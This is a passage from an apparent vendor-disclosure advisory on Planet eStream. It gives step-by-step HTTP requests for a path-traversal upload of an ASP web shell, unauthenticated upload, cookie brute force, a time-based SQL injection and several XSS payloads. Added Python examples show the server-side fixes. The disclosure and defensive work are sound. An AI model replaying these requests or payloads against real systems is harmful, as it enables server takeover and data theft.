This<br />restriction is only enforced in the frontend and can be bypassed by<br />intercepting the request and modifying it. There is no further validation of<br />uploaded files in the backend. Therefore, it is sufficient to change the<br />filename ending in the intercepted request.<br /><br />a) File Upload with Path Traversal<br /><br />An authenticated attacker with the permission to attach documents to already<br />existing content (e.g. videos) can upload any file. In some cases, the role<br />Member is sufficient. Under "Categories -> choose a video -> related Media" a new<br />malicious file can be uploaded.<br /><br />The following POST request is sent to the server when a normal PNG file is uploaded:<br />===============================================================================<br />POST /Upload2.ashx?f=seclogo.png&c=0&l=53134&t=1662103112126&p=\Temp&ut=0&tc=0&bs=53134&ct=1662103112126 HTTP/2<br />Host: $host<br />Cookie: [...]<br /><br />‰PNG<br />[...]<br />===============================================================================<br /><br />Based on the previous POST request to upload files, the request can be<br />manipulated to upload any content to any directory by using path traversal<br />techniques. The following code shows the modified request. The content is<br />changed from a PNG image to an ASP web shell. 
The filename ending is changed to<br />asp and the path is inserted into the p parameter, which is vulnerable to path<br />traversal.<br />===============================================================================<br />POST /Upload2.ashx?f=webshell.asp&c=0&l=1024&t=1661943922096&p=..\$path\&ut=0&tc=0&bs=1024&ct=1661943922097 HTTP/2<br />Host: $host<br />Cookie: [...]<br /><br />$ASPWEBSHELL<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Fri, 02 Sep 2022 07:16:11 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />The web shell can now be accessed via the following URL:<br />===============================================================================<br />https://$host/$path/webshell.asp<br />===============================================================================<br /><br />An attacker now has the possibility to execute any command in the context of the web<br />server. Therefore, the web server is completely compromised.<br /><br />As described in chapter 3) Broken Access Control, section a) an unauthenticated<br />file upload is possible if the attacker knows the correct request.<br /><br /><br />b) General Upload<br /><br />An authenticated attacker with the permission to upload documents (role editor,<br />publisher or admin) can upload any file.
Under "Create -> Upload -> Upload<br />Document" a new malicious file can be uploaded.<br /><br />i) ASP Web Shell<br /><br />After choosing the malicious file for the file upload the following POST request<br />is sent to the web server:<br />===============================================================================<br />POST /Upload2.ashx?f=cmdasp.asp&c=0&l=1024&t=1661939611305&p=PreConversionMedia\&ut=0&tc=0&bs=1024&ct=1661939611305 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Length: 1024<br /><br />$ASPWEBSHELL<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Wed, 31 Aug 2022 09:53:31 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />To finish the upload of the malicious file, an attacker simply needs to click<br />the "Start Upload" button that becomes visible in the web interface.<br />After starting the upload, the following POST request is sent to the web server.<br /><br />===============================================================================<br />POST /Ajax.asmx/ProcessUpload2 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 538<br /><br />{"fn":"webshell.asp","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsource"<br />:0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"FieldValu<br />e\":\"webshell\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"Type\":\<br />"ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\<br 
/>":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue\":\<br />"\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""}<br />===============================================================================<br /><br />The response of the web server discloses the newly generated filename<br />8273~4u~vE7bUON0 as shown below.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Wed, 31 Aug 2022 09:53:31 GMT<br />Content-Length: 541<br /><br />{"d":"{\"Success\":true,\"ClipDataID\":8273,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element<br />bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8273~4u~vE7bUON0\",<br />[...]<br />}<br />===============================================================================<br /><br />After the filename is known, the web shell can be accessed via the following URL:<br />===============================================================================<br />https://$host/content/8273_4u~vE7bUON0.asp<br />===============================================================================<br /><br />An attacker now has the possibility to execute any command in the context of the web<br />server.
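The Upload2.ashx requests in a) and b) above go through because the handler trusts three client-supplied things: the session (none is required), the target directory in p (where "..\" walks out of the upload area), and the filename ending (which alone decides the file type). The following Python functions are an added example, not Planet eStream code, of the server-side checks that would refuse both requests while still accepting the seclogo.png upload: UPLOAD_ROOT and the allowed types are assumptions, and the PNG body is constructed.

```python
"""Server-side checks for an Upload2.ashx-style handler.

Added example, not Planet eStream code. It models the three controls the
requests above show to be missing: the caller must hold a session, the
client-supplied directory ('p') is confined to the upload root, and the
file type is decided by an allowlist plus magic bytes rather than by the
client's filename ending. UPLOAD_ROOT is an assumed location.
"""
import posixpath
import secrets
from typing import Optional

UPLOAD_ROOT = "/var/www/estream/uploads"   # assumed, not the product's path

# Allowed types with the leading bytes the body must carry.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}

# Constructed PNG-like body: correct signature followed by filler.
PNG_SAMPLE = ALLOWED_TYPES["png"] + b"\x00" * 16


class UploadRejected(Exception):
    """Raised with a short reason when a request fails a check."""


def resolve_target_dir(root: str, p: str) -> str:
    """Map the client's 'p' value to a directory that stays inside root.

    Backslashes (the advisory's requests use Windows paths) are normalised
    to '/', a leading separator is dropped so '\\Temp' means root/Temp, and
    drive letters or any '..' that escapes root are rejected.
    """
    candidate = p.replace("\\", "/").lstrip("/")
    if ":" in candidate:
        raise UploadRejected("absolute path")
    resolved = posixpath.normpath(posixpath.join(root, candidate))
    if resolved != root and not resolved.startswith(root + "/"):
        raise UploadRejected("path traversal")
    return resolved


def detect_type(filename: str, content: bytes) -> str:
    """Return the extension only if it is allowlisted and matches the bytes."""
    if "/" in filename or "\\" in filename or "." not in filename:
        raise UploadRejected("bad filename")
    ext = filename.rsplit(".", 1)[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension not allowed: {ext}")
    if not content.startswith(magic):
        raise UploadRejected("content does not match declared type")
    return ext


def handle_upload(session_user: Optional[str], f: str, p: str, content: bytes,
                  root: str = UPLOAD_ROOT) -> str:
    """Return the server-chosen storage path for an accepted upload."""
    if session_user is None:
        raise UploadRejected("authentication required")
    target_dir = resolve_target_dir(root, p)
    ext = detect_type(f, content)
    # The on-disk name is random; the client's filename never reaches the filesystem.
    return posixpath.join(target_dir, f"{secrets.token_hex(16)}.{ext}")


def rejection_reason(session_user: Optional[str], f: str, p: str, content: bytes,
                     root: str = UPLOAD_ROOT) -> Optional[str]:
    """None if the upload would be accepted, otherwise the reason it was refused."""
    try:
        handle_upload(session_user, f, p, content, root)
    except UploadRejected as exc:
        return str(exc)
    return None
```

Confining p to the upload root is the minimum; an allowlist of the subdirectories the application actually uses (the requests above show Temp and PreConversionMedia) is tighter still. The web server should additionally be configured not to execute anything under the upload root.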
Therefore, the web server is completely compromised.<br /><br />ii) Malicious HTML File<br /><br />After choosing the malicious file, the following POST request is sent to the web<br />server:<br />===============================================================================<br />POST /Upload2.ashx?f=secconsult.html&c=0&l=102&t=1661947994372&p=PreConversionMedia\&ut=0&tc=0<br />&bs=102&ct=1661947994373 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Length: 1024<br /><br /><!DOCTYPE html><br /><html><br /><body><br /><h1>SEC Consult Webpage</h1><br /><p>hosted by $host</p><br /></body><br /></html><br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Wed, 31 Aug 2022 12:13:13 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />To finish the upload of the malicious file, an attacker simply needs to click<br />the "Start Upload" button which pops up in the web interface.<br />After starting the upload, the following POST request is sent to the web server:<br />===============================================================================<br />POST /Ajax.asmx/ProcessUpload2 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 539<br /><br />{"fn":"secconsult.html","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsou<br />rce":0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"Field<br />Value\":\"secconsult\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"T<br 
/>ype\":\"ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"F<br />ieldID\":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue<br />\":\"\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""}<br />===============================================================================<br /><br />The response of the web server discloses the newly generated filename<br />8278~4z~b2w2tWQF as shown below.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Wed, 31 Aug 2022 12:13:14 GMT<br />Content-Length: 545<br /><br />{"d":"{\"Success\":true,\"ClipDataID\":8278,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element<br />bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8278~4z~b2w2tWQF\",<br />[...]<br />}<br />===============================================================================<br /><br />The HTML webpage can now be accessed via the following URL:<br />===============================================================================<br />https://$host/content/8278_4z~b2w2tWQF.html<br />===============================================================================<br /><br />An attacker now has the possibility to infect the user's browser with JavaScript<br />to execute any command in the context of the web server or can host webpages for<br />phishing attacks on the server of the Planet eStream instance.<br /><br /><br />2) Account Takeover (CVE-2022-45893)<br />An authenticated attacker with the role Member or Bypass can elevate their<br />privileges by changing the ON cookie value.
An attacker can easily brute force<br />the value of the cookie due to the low entropy of the cookie or search for<br />leaked cookie values in the web application as described in chapter<br />8) Information Disclosure, section a).<br /><br />Based on the format of the cookie the following pattern was used to generate<br />possibly valid cookies.<br />===============================================================================<br />[0-1][AZ]~[azAZ][azAZ]<br />===============================================================================<br /><br />To verify the vulnerability an authenticated session is required. Sessions that<br />are created by opening a sharing link to bypass authentication are sufficient.<br />Therefore, an attacker doesn’t necessarily need a valid user account with valid<br />credentials to gain privileged access.<br /><br />To abuse the vulnerability, an attacker can use the browser developer tool to<br />permanently change the value of the ON cookie. By changing the value of the<br />ON cookie for example to $VALID_COOKIE, the current privileges are set to the<br />privileges of the original user who has the ON cookie $VALID_COOKIE.<br /><br />An attacker can gain administrative privileges and access other accounts by<br />obtaining valid ON cookies for the respective accounts through brute force or<br />information disclosure.<br /><br />One essential aspect is that the ON cookie is persistent and never changes, not<br />even between sessions. Therefore, an attacker has permanent access to elevated<br />privileges or other user accounts once a valid ON cookie is identified.<br /><br /><br />3) Broken Access Control (CVE-2022-45891)<br />a) Unauthenticated Upload<br /><br />As described in chapter 1) Upload of Arbitrary Files Leading to Remote Code<br />Execution an attacker has the possibility to upload arbitrary files. 
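Section 2) above describes a cookie that is short enough to enumerate, carries the user's privileges in its value, and never changes. The following Python code is an added example, not Planet eStream code: on_cookie_keyspace() sizes the pattern quoted above under an assumed reading ([0-1] as the digit 0 or 1, [AZ] as one upper-case letter, [azAZ] as one letter of either case), SessionStore shows the properties a session token needs instead (256 random bits, privileges looked up server-side, expiry, a fresh token on login), and clients_guessing_cookies() is a log-side check for the brute force described above, run over constructed events.

```python
"""Session tokens for the ON cookie problem in section 2) above.

Added example, not Planet eStream code. on_cookie_keyspace() sizes the
quoted pattern [0-1][AZ]~[azAZ][azAZ] under an assumed reading (one digit
0 or 1, one upper-case letter, a literal '~', two letters of either case).
SessionStore shows what the ON cookie lacks: an opaque 256-bit random
value, privileges held server-side, expiry, and rotation on login.
clients_guessing_cookies() flags the brute force the advisory describes.
"""
import secrets
import string
import time
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Character class of each position in the observed cookie pattern.
ON_COOKIE_CLASSES = ["01", string.ascii_uppercase, "~",
                     string.ascii_letters, string.ascii_letters]


def on_cookie_keyspace() -> int:
    """Distinct values the observed pattern can take: 2 * 26 * 1 * 52 * 52."""
    n = 1
    for cls in ON_COOKIE_CLASSES:
        n *= len(cls)
    return n


@dataclass
class Session:
    user_id: str
    role: str
    expires_at: float


class SessionStore:
    """Opaque random tokens mapped to server-side session records."""

    def __init__(self, ttl_seconds: int = 3600) -> None:
        self.ttl = ttl_seconds
        self._sessions: Dict[str, Session] = {}

    def issue(self, user_id: str, role: str, now: Optional[float] = None) -> str:
        """Create a session; the token itself carries no user or role information."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = Session(user_id, role, now + self.ttl)
        return token

    def lookup(self, token: str, now: Optional[float] = None) -> Optional[Session]:
        """Return the session for a token, dropping it if it has expired."""
        now = time.time() if now is None else now
        session = self._sessions.get(token)
        if session is None:
            return None
        if now >= session.expires_at:
            del self._sessions[token]
            return None
        return session

    def rotate(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Replace a token (on login or privilege change) so old values stop working."""
        session = self.lookup(token, now)
        if session is None:
            return None
        del self._sessions[token]
        return self.issue(session.user_id, session.role, now)


def clients_guessing_cookies(events: Iterable[Tuple[float, str, str]],
                             window_seconds: float = 60.0,
                             threshold: int = 20) -> List[str]:
    """IPs that presented >= threshold distinct cookie values within a window.

    events are (timestamp, client_ip, cookie_value) triples; a legitimate
    client presents one stable value for the life of its session.
    """
    by_ip: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for ts, ip, cookie in sorted(events):
        by_ip[ip].append((ts, cookie))
    flagged = []
    for ip, rows in by_ip.items():
        for i, (start, _) in enumerate(rows):
            distinct = {c for t, c in rows[i:] if t - start <= window_seconds}
            if len(distinct) >= threshold:
                flagged.append(ip)
                break
    return sorted(flagged)


# Constructed sample: one client reusing its cookie, one cycling through guesses.
SAMPLE_EVENTS = [(1000.0 + i, "10.0.0.5", "0A~ab") for i in range(30)] + \
                [(1000.0 + i, "10.0.0.9", f"0A~a{c}")
                 for i, c in enumerate(string.ascii_letters[:25])]
```

With a key space of 140,608 values the whole cookie space can be tried in minutes at ordinary request rates, which is why a rate limit alone does not fix the design; the token must be unguessable and the privilege decision must come from the server-side record.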
Once<br />attackers know the correct POST request to upload files, they can repeat the<br />same request without prior authentication and successfully upload arbitrary<br />files. To verify the vulnerability the following request can be sent<br />unauthenticated (without cookies) to the web server.<br />===============================================================================<br />POST /Upload2.ashx?f=unauthenticated.txt&c=0&l=30&t=1662047867388&p=..\..\&ut=0&tc=0&bs=30&ct=1662047867388 HTTP/2<br />Host: $host<br /><br />SEC Consult - upload<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Date: Mo, 19 Sep 2022 08:10:44 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />The unauthenticated file upload was verified by identifying the file<br />unauthenticated.txt on the server.<br /><br />In conclusion, this vulnerability exacerbates the risk of the file upload<br />vulnerability. It increases the likelihood of exploitation since it enables an<br />attacker to upload files without authentication.<br /><br /><br />b) Access Grant List<br /><br />An attacker needs to be authenticated with the role Member or Bypass to exploit<br />the vulnerability. The vulnerability allows an attacker to modify the access<br />list and grant himself access to private videos. Additionally, an attacker can<br />make any video unavailable to other users by changing the access grant list.<br />The vulnerability also applies to other content on the platform.<br /><br />To verify the vulnerability a video with restricted access is created. 
It can<br />be accessed under the following URL:<br />===============================================================================<br />https://$host/View.aspx?id=1337~4u~vE7bUKN5<br />===============================================================================<br /><br />By executing the POST request shown below, an attacker can add himself to the<br />access grant list and gain access to the private video.<br />===============================================================================<br />POST /Ajax.asmx/SaveGrantAccessList HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 65<br /><br />{"cdid":"1337","data":"[{\"Address\":\"test@attacker.com\",\"CanEdit\":true}]"}<br />===============================================================================<br /><br />The server responds with status code 200 and a success message.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Thu, 01 Sep 2022 10:20:58 GMT<br />[...]<br />Content-Length: 75<br /><br />{"d":"{\"Success\":true,\"Message\":\"Access list updated successfully\"}"}<br />===============================================================================<br /><br />The user with the e-mail address test@attacker.com has been added to the<br />access grant list and can view the private video with the ID 1337.<br /><br />The vulnerability can also be leveraged to block access to the video for other<br />users (Denial-of-Service) by adding any malicious content "malicious_payload"<br />instead of the valid e-mail address.<br /><br /><br />4) SQL Injection (CVE-2022-45889)<br />To demonstrate this vulnerability access to the search functionality in the<br />statistic interface is required.
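In the request that follows, the legitimate value of the flt parameter is itself an SQL fragment (s_RecordTypeID IN (1)), which is what lets the appended WAITFOR DELAY run. The following Python code is an added example, not Planet eStream code: it parses flt into a column name checked against an allowlist plus a list of integers, and runs the statistics query with bound parameters, so the advisory's injected value is refused outright. The sqlite3 table and rows are constructed for the demo, and column names other than s_RecordTypeID are assumptions.

```python
"""Structured handling of the statistics filter (flt) from section 4) above.

Added example, not Planet eStream code. The legitimate flt value in the
request is an SQL fragment ('s_RecordTypeID IN (1)'), which is what lets
'; WAITFOR DELAY ...' ride along. Instead of concatenating it, the value
is parsed into an allowlisted column and a list of integers, and the query
is built with bound parameters. The sqlite3 table and its rows are
constructed for the demo; column names other than s_RecordTypeID are assumed.
"""
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote_plus

# Columns the statistics page may filter on (s_RecordTypeID is from the advisory).
FILTERABLE_COLUMNS = {"s_RecordTypeID", "s_ClipDataID"}

# Only '<column> IN (<int>, <int>, ...)' is accepted; anything else is an error.
FLT_RE = re.compile(
    r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s+IN\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)\s*$"
)

# Raw flt value from the advisory's request, as it appears in the query string.
INJECTED_FLT = "+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+'0:0:5'--"
DECODED_INJECTED_FLT = unquote_plus(INJECTED_FLT)


class BadFilter(ValueError):
    """The flt value is not a structured filter the statistics page supports."""


def parse_flt(flt: str) -> Tuple[str, List[int]]:
    """Turn a flt string into (column, values) or raise BadFilter."""
    m = FLT_RE.match(flt)
    if not m:
        raise BadFilter("filter must have the form '<column> IN (<integers>)'")
    column = m.group(1)
    if column not in FILTERABLE_COLUMNS:
        raise BadFilter(f"column not filterable: {column}")
    values = [int(v) for v in m.group(2).split(",")]
    return column, values


def flt_accepted(flt: str) -> bool:
    """True if parse_flt() accepts the value."""
    try:
        parse_flt(flt)
    except BadFilter:
        return False
    return True


def build_where(column: str, values: List[int]) -> Tuple[str, List[int]]:
    """Parameterised IN clause: the column comes from the allowlist, values are bound."""
    placeholders = ", ".join("?" for _ in values)
    return f"{column} IN ({placeholders})", values


def viewing_day_count(conn: sqlite3.Connection, flt: str, day: str) -> int:
    """Rows for one viewing day matching the filter, executed with bound parameters."""
    column, values = parse_flt(flt)
    where, params = build_where(column, values)
    sql = f"SELECT COUNT(*) FROM stats WHERE viewingday = ? AND {where}"
    return conn.execute(sql, [day, *params]).fetchone()[0]


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the stats table, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE stats (s_RecordTypeID INTEGER, s_ClipDataID INTEGER, viewingday TEXT)"
    )
    conn.executemany(
        "INSERT INTO stats VALUES (?, ?, ?)",
        [(1, 8273, "20220831"), (1, 8278, "20220831"),
         (2, 8273, "20220831"), (1, 8273, "20220830")],
    )
    return conn
```

The shape of the fix matters more than the regex: the client should never be able to send SQL text at all, and a rejected filter should return an error rather than fall back to an unfiltered query.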
An authenticated attacker with the role<br />Publisher or Admin can use the following GET request to reproduce the<br />vulnerability.<br />===============================================================================<br />GET /Stats/StatisticsResults.aspx?q=viewingday&p1=20220831&p2=&db1=stats&db2=clipdata&flt=+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+'0:0:5'-- HTTP/2<br />Host: $host<br />Cookie: [...]<br />===============================================================================<br /><br />The resulting response took more than five seconds. Thus, it can be<br />concluded that an SQL injection is present.<br />Furthermore, exploitation by the tool sqlmap was possible and led to a<br />successful extraction of the complete backend database.<br /><br /><br />5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)<br />a) Disclaimer<br /><br />An attacker needs to be authenticated with the role Admin to exploit the stored<br />XSS vulnerability. The payload is then executed for each user<br />who logs into the web application. To verify the issue, an attacker needs to<br />modify the disclaimer of the cookie description. In the admin section the<br />system options can be modified to change the disclaimer text.<br /><br />===============================================================================<br />https://$host/Admin/SystemOptions.aspx?disclaimer=1<br />===============================================================================<br /><br />By clicking the Source button, an admin user can inject a malicious payload.<br />===============================================================================<br /><img src=x onerror=javascript:alert(location.origin)//"><br />===============================================================================<br /><br />After saving the modified disclaimer text, the payload is executed by visiting<br />different parts of the application.
If a user visits the MyHome tab, the payload<br />is triggered in the browser. The payload is also executed if a user hasn't<br />accepted the disclaimer text yet, which is true for any new user.<br /><br />b) Search Function<br /><br />An attacker needs to be authenticated with the role Member to exploit the stored<br />XSS vulnerability. The payload is then executed for each user<br />who inspects the statistic view provided by the web application. To verify the<br />issue, an attacker can search for the following malicious payload, which is then<br />automatically stored in the database.<br />===============================================================================<br /><img onerror="javascript:alert(location.origin)" src="abcdef";//<<br />===============================================================================<br /><br />Afterwards, the malicious payload is triggered if a user lists the statistical<br />data for the Search Breakdown in the last seven days.<br /><br />c) Comments<br /><br />An attacker needs to be authenticated with the role Member to exploit the stored<br />XSS vulnerability. The payload is then executed for each user<br />who visits the content element that contains the malicious comment. To verify<br />the issue, the following malicious payload can be injected into the public or<br />private comment field.<br />===============================================================================<br /><img onerror="javascript:alert(location.origin)" src="abcdef";//<br />===============================================================================<br /><br />d) Batch editing tool<br /><br />An attacker needs to be authenticated with the role Admin to exploit the stored<br />XSS vulnerability. The payload is then executed for each user<br />who visits the modified content. To verify the issue, an attacker needs to<br />modify the owner of the content.
In the search section the admin has the<br />possibility to use the Batch-Editing tool.<br />===============================================================================<br />https://$host/Default.aspx?search=consult&o=8&page=1&fp=0&report=1&rlt=0<br />===============================================================================<br /><br />By selecting the action Change owner, an admin user can inject a malicious<br />payload in the user input box.<br />===============================================================================<br /><img src=x onerror=javascript:alert(location.origin)//"><br />===============================================================================<br /><br />After injecting the malicious payload, the XSS payload is executed when the<br />content element is visited or when it appears in search results.<br />===============================================================================<br />https://$host/Default.aspx?search=8298<br />https://$host/View.aspx?id=8298~4B~dpa3P9mb&psid=136<br />===============================================================================<br /><br />e) Content Creation<br /><br />Permission to create content within the web application is required. Thus, an<br />attacker needs to be authenticated with the role Editor, Publisher, or Admin to<br />exploit the vulnerability. The issue can be verified by placing malicious HTML<br />code in the title input field of the content creation dialog window. For this<br />the following malicious payload can be used:<br />===============================================================================<br /><img src='x' onerror='javascript:alert(location.origin)' style='<br />===============================================================================<br /><br />When the content creation process is finished, the JavaScript code is<br />permanently stored in the web application.
It will trigger in every browser that
visits web pages that list the modified item (for example, under the category
view, search results and content list).

The following content upload possibilities are affected by this vulnerability:
- Upload Video or Audio files
- Upload Documents
- Add External Links
- Playlist
- Photoset

f) Related Media

HTML code can be injected in the title of the related media upload. Editing
access to the content is required. This is normally the case for users with
the role Editor, Publisher or Admin. The malicious code can be injected in
the title of the related content. To validate the vulnerability a new file must
be uploaded in the related media tab. The next step is to change the filename
to inject the malicious HTML and JavaScript code.
===============================================================================
<img src='x' onerror='javascript:alert(location.origin)'photo.png
===============================================================================

When the title including the malicious payload is saved and the page reloaded,
the payload within the title will be executed. The new title is stored in the
web application along with the malicious HTML code. It will execute in any
browser that visits the content item. Opening the related media tab is not
necessary.

g) Create new user

An attacker needs to be authenticated with the role Admin to exploit the stored
XSS vulnerability. The payload is afterwards executed for admin users in the
user section and for the created users once they are logged in. To verify the
issue, an attacker needs to create a new user.
Under Tools -> Admin ->
Users, Permissions, Authentication -> Users the admin has the possibility to
create new users.
===============================================================================
https://$host/Admin/EditUser.aspx
===============================================================================

The following malicious payload was added to the Full Name input field:
===============================================================================
<script>alert(location.origin)</script>
===============================================================================

After creating the new user, the malicious payload gets executed once the new
user logs in or the admin visits the user section (Tools -> Admin -> Users,
Permissions, Authentication -> Users).

h) Change Username

A cross-site scripting vulnerability can be found under https://$host/MyHome.aspx
where a user can edit the name shown on their home page. All authenticated users
can access home pages of other users and are thus affected by this vulnerability.
Furthermore, the vulnerability can be exploited by an authenticated user of any
role.
The following request was used to change the username.
===============================================================================
POST /Ajax.asmx/SaveLayoutData HTTP/2
Host: $host
Cookie: [...]
Content-Length: 360
Content-Type: application/json; charset=UTF-8
[...]

{"id":$ID,"layoutdata":"[{\"title\":{\"enabled\":true,\"text\":\"test<img
src='x' onerror='alert(location.origin)'\",[...]
===============================================================================

The request is accepted by the web application as shown below:
===============================================================================
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 92

{"d":"{\"Success\":true,\"Message\":\"Layout erfolgreich gespeichert\",\"HTML\":
[\"455\"]}"}
===============================================================================

Sending the request directly bypasses the check for special characters like < or >
that exists in the frontend. The malicious username string is embedded on the
website and will execute when it is opened in the browser in any subsequent
request.


6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)
An attacker needs authenticated access to the web application with the role
Member or higher to identify and exploit the vulnerability.
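The stored findings in 5a-h and this reflected finding share one root cause:
user-controlled text reaches the HTML response without output encoding, and in
5h the only filter for < and > runs in the browser. The following Python script
is an added example for this advisory, not code from the advisory's authors or
from the affected product; the function names, the rendering templates, the
length limit and the request body (modelled on the one quoted in 5h) are
assumptions. It shows that a direct request never reaches the frontend check,
and that context-aware encoding on the server leaves every payload quoted in
sections 5 and 6 inert:

```python
"""Added example (not the advisory's or the product's code): server-side
handling of the user-supplied title from the SaveLayoutData request (5h) and
of a reflected metadata filter value (6). Function names, templates, the
length limit and the constructed request body are assumptions."""
import html
import json
import re
from urllib.parse import unquote

# Constructed request body modelled on the SaveLayoutData request in 5h
# (the real body carries more fields, elided there as [...]).
REQUEST_BODY = json.dumps({
    "id": 455,
    "layoutdata": json.dumps([{
        "title": {
            "enabled": True,
            "text": "test<img src='x' onerror='alert(location.origin)'",
        }
    }]),
})

# Payloads quoted in sections 5 and 6; used here only to check the encoder.
ADVISORY_PAYLOADS = [
    "<script>alert(location.origin)</script>",
    '<img onerror="javascript:alert(location.origin)" src="abcdef";//',
    '<img src=x onerror=javascript:alert(location.origin)//">',
    "<img src='x' onerror='javascript:alert(location.origin)' style='",
    "(0_7_0_<script>alert(location.origin)</script>__)",
]

TITLE_MAX_LEN = 100  # assumed server-side limit for the home page title


def frontend_check(text: str) -> bool:
    """Mirrors the client-side check described in 5h (rejects < and >).
    It runs in the browser only, so a crafted POST never goes through it."""
    return "<" not in text and ">" not in text


def extract_title(body: str) -> str:
    """Parse the double-encoded layoutdata field and return the raw title."""
    outer = json.loads(body)
    layout = json.loads(outer["layoutdata"])
    return layout[0]["title"]["text"]


def validate_title(text: str) -> str:
    """Server-side input validation (defence in depth, not the primary fix):
    bounded length, no control characters. Raises ValueError otherwise."""
    if len(text) > TITLE_MAX_LEN:
        raise ValueError("title too long")
    if re.search(r"[\x00-\x1f\x7f]", text):
        raise ValueError("control characters in title")
    return text


def encode_for_html(text: str) -> str:
    """Encode for an HTML text node or a quoted attribute value.
    & < > " ' are replaced, so no tag or attribute can be opened or closed."""
    return html.escape(text, quote=True)


def render_home_title(body: str) -> str:
    """What the MyHome page should emit for the stored title: the encoder is
    applied in both the attribute context and the text-node context."""
    title = validate_title(extract_title(body))
    safe = encode_for_html(title)
    return f'<h1 title="{safe}">{safe}</h1>'


def render_search_filter(r_param: str) -> str:
    """Reflecting a metadata filter value (section 6): URL-decode first, then
    encode for HTML. Decoding after encoding would reopen the hole."""
    return f'<span class="filter">{encode_for_html(unquote(r_param))}</span>'


def user_markup_is_inert(rendered: str, template_tags: tuple) -> bool:
    """True if the only tags in the fragment are the template's own tags,
    i.e. nothing from the user data opened a new element."""
    found = set(re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", rendered))
    return found <= set(template_tags)


if __name__ == "__main__":
    raw = extract_title(REQUEST_BODY)
    print("frontend check would have blocked it:", not frontend_check(raw))
    print(render_home_title(REQUEST_BODY))
    print(render_search_filter(
        "(0_7_0_%3Cscript%3Ealert(location.origin)%3C/script%3E__)"))
```

The check in `frontend_check` is the one the advisory describes as bypassed;
the script keeps it only to show that the same text is already in the request
body when the server sees it. Encoding belongs at the point of output, with the
encoder chosen for the context (text node, quoted attribute), and any
URL-decoding happens before it, never after.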
To identify this
vulnerability, it is sufficient to open the following URL (no special manipulation
of the request is needed) and analyze the HTTP response from the web server:
===============================================================================
https://$host/Default.aspx?search=test&page=1&fp=0&r=(0_7_0_%3Ch1%3ESEC%20Consult%3C/h1%3E__)
===============================================================================

The string SEC Consult is embedded in the webpage of this URL.
The next step is to identify a working payload which triggers the cross-site
scripting vulnerability. To verify the vulnerability, it is sufficient to open
the following URL:
===============================================================================
